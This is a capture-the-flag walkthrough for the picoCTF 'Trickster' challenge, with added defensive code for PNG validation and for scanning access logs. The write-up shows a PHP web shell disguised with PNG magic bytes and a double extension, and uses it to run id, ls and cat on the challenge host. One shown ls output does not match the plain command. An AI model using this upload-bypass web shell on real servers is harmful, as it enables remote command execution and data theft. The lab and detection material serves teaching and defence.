Level: Medium
Tags: Web Exploitation, picoCTF 2024, browser_webshell_solvable
Author: JUNIAS BONOU
Description:
I found a web app that can help process images: PNG images only!
Try it here!
Hints:
(None)
Challenge link: https://play.picoctf.org/practice/challenge/445
Browse to the web site and you will see a web page with the message "Welcome to my PNG processing app".
On the web page you can upload PNG files.
Right-click and select 'View page source' (or press CTRL + U) to get the HTML source of the page.
<!DOCTYPE html>
<html>
<head>
<title>File Upload Page</title>
</head>
<body>
<h1>Welcome to my PNG processing app</h1>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file" accept=".png">
<input type="submit" value="Upload File">
</form>
</body>
</html>
Not much there, other than that the uploaded file needs to have a .png extension (the accept attribute on the file input is only a browser-side filter; the server's own check is what matters).
If we try to upload any PNG picture we get the message:
File uploaded successfully and is a valid PNG file. We shall process it and get back to you... Hopefully
We get no indication of where the file is uploaded, but normally the destination is the /uploads directory.
Let's verify this by browsing to http://atlas.picoctf.net:53321/uploads/test_file.png.
Correct! Our test file is displayed.
Next, we will try to upload a web shell disguised as a PNG file.
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Web_Exploitation/Trickster]
└─$ cat web_shell.png.php
�PNG<?php system($_GET["cmd"]); ?>
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Web_Exploitation/Trickster]
└─$ xxd web_shell.png.php
00000000: 8950 4e47 3c3f 7068 7020 7379 7374 656d .PNG<?php system
00000010: 2824 5f47 4554 5b22 636d 6422 5d29 3b20 ($_GET["cmd"]);
00000020: 3f3e 0a
Note the PNG magic bytes (89 50 4e 47) at the beginning of the file: the server's "valid PNG" check only looks at these bytes, so the file is accepted, while the .php extension means the server executes what follows them.
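The reason this file passes is that a magic-bytes check is not a PNG check. Below is an added example (not the write-up's code and not the challenge's own index.php, whose source is not shown) contrasting an assumed naive checker, modelled on the observed "valid PNG" behaviour, with a strict one that walks the chunk structure and a filename check that rejects double extensions. The sample web shell bytes are the ones from the write-up; the 1x1 PNG is constructed inline as a positive case.

```python
"""Added example: naive magic-bytes check vs. structural PNG validation.
Not part of the original write-up; the naive checker is an assumption."""
import os
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # full 8-byte signature, not just 0x89 'PNG'

# Constructed sample: the write-up's web shell (magic bytes followed by PHP).
WEB_SHELL = b"\x89PNG<?php system($_GET[\"cmd\"]); ?>\n"


def naive_is_png(data: bytes) -> bool:
    """Assumed behaviour of the vulnerable app: only the first four bytes are checked."""
    return data[:4] == b"\x89PNG"


def strict_is_png(data: bytes) -> bool:
    """Full signature, IHDR first, every chunk CRC valid, IEND last, nothing after it."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos = len(PNG_SIGNATURE)
    first = True
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):  # truncated chunk
            return False
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            return False
        if first and ctype != b"IHDR":
            return False
        first = False
        pos += 12 + length
        if ctype == b"IEND":
            return pos == len(data)  # trailing payload after IEND is rejected
    return False  # ran out of data without seeing IEND


def safe_extension(filename: str) -> bool:
    """Exactly one extension and it is .png (rejects names like web_shell.png.php)."""
    base = os.path.basename(filename)
    return base.count(".") == 1 and base.lower().endswith(".png")


def make_minimal_png() -> bytes:
    """Construct a valid 1x1 RGB PNG so the strict checker has a positive case."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel
    return PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def accept_upload(filename: str, data: bytes) -> bool:
    """What the upload handler should require before writing anything to /uploads."""
    return safe_extension(filename) and strict_is_png(data)


if __name__ == "__main__":
    print("naive accepts web shell:", naive_is_png(WEB_SHELL))
    print("strict accepts web shell:", strict_is_png(WEB_SHELL))
    print("strict accepts real PNG:", strict_is_png(make_minimal_png()))
    print("upload accepted:", accept_upload("web_shell.png.php", WEB_SHELL))
```

Even with this check in place, the upload directory should be served with script execution disabled and files should be stored under a server-generated name, so that a file that slips through is never interpreted by PHP.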
Then we upload the web shell through the web page.
Now we can run simple commands through the web shell:
Accessing http://atlas.picoctf.net:53321/uploads/web_shell.png.php?cmd=id
returns:
�PNGuid=33(www-data) gid=33(www-data) groups=33(www-data)
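From the defender's side, the requests above are easy to pick out of a web server access log. The following added example (not from the write-up) scans constructed Apache combined-format lines, with request targets mirroring the write-up and a made-up client address and timestamps, and flags three signals: a script extension under /uploads/, a double extension, and a command-style query parameter. The extension and parameter lists are assumptions chosen for illustration.

```python
"""Added example: flag web-shell style requests in an access log.
Not part of the original write-up; the log lines are constructed."""
from __future__ import annotations
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample (Apache combined format). Request targets follow the
# write-up; client address, timestamps and byte counts are made up.
ACCESS_LOG = """\
10.0.0.5 - - [11/Mar/2024:23:58:01 +0000] "GET / HTTP/1.1" 200 412 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Mar/2024:23:58:10 +0000] "POST / HTTP/1.1" 200 98 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Mar/2024:23:58:20 +0000] "GET /uploads/test_file.png HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Mar/2024:23:59:02 +0000] "GET /uploads/web_shell.png.php?cmd=id HTTP/1.1" 200 60 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Mar/2024:23:59:15 +0000] "GET /uploads/web_shell.png.php?cmd=ls HTTP/1.1" 200 460 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Mar/2024:23:59:30 +0000] "GET /uploads/web_shell.png.php?cmd=cat%20/var/www/html/GNTDOMBWGIZDE.txt HTTP/1.1" 200 54 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumed lists for illustration; tune to the server's handler configuration.
EXEC_EXTENSIONS = {".php", ".phtml", ".phar", ".php5"}
COMMAND_PARAMS = {"cmd", "exec", "command"}
UPLOAD_PREFIX = "/uploads/"


def classify_request(target: str) -> list[str]:
    """Return the list of signals that apply to one request target (path + query)."""
    parts = urlsplit(target)
    name = parts.path.rsplit("/", 1)[-1]
    reasons: list[str] = []
    if parts.path.startswith(UPLOAD_PREFIX):
        exts = [e.lower() for e in name.split(".")[1:]]
        if exts and "." + exts[-1] in EXEC_EXTENSIONS:
            reasons.append("executable_in_uploads")
        if len(exts) > 1:
            reasons.append("double_extension")
    if COMMAND_PARAMS & set(parse_qs(parts.query).keys()):
        reasons.append("command_parameter")
    return reasons


def scan_access_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Yield (line number, request target, signals) for every flagged line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((n, m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for n, target, reasons in scan_access_log(ACCESS_LOG):
        print(f"line {n}: {target} -> {', '.join(reasons)}")
```

The first signal alone is enough to alert on: a 200 response for a .php path under the upload directory means the server is executing uploaded content, which is the misconfiguration the web shell depends on.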
The web server's document root is usually at /var/www/html. Let's check that directory.
Accessing http://atlas.picoctf.net:53321/uploads/web_shell.png.php?cmd=ls
returns (with view source on the page):
�PNGtotal 16
drwxrwxrwt 1 www-data www-data 21 Mar 11 23:59 .
drwxr-xr-x 1 root root 18 Nov 21 2023 ..
-rw-r--r-- 1 root root 49 Mar 11 23:59 GNTDOMBWGIZDE.txt
-rw-r--r-- 1 root root 1572 Feb 7 17:25 index.php
-rw-r--r-- 1 root root 415 Feb 7 17:25 instructions.txt
-rw-r--r-- 1 root root 62 Feb 7 17:25 robots.txt
drwxr-xr-x 1 www-data root 31 Jul 13 08:50 uploads
The GNTDOMBWGIZDE.txt file looks very suspicious.
Viewing the file by accessing http://atlas.picoctf.net:53321/uploads/web_shell.png.php?cmd=cat%20/var/www/html/GNTDOMBWGIZDE.txt
returns the flag:
�PNG/* picoCTF{<REDACTED>} */
For additional information, please see the references below.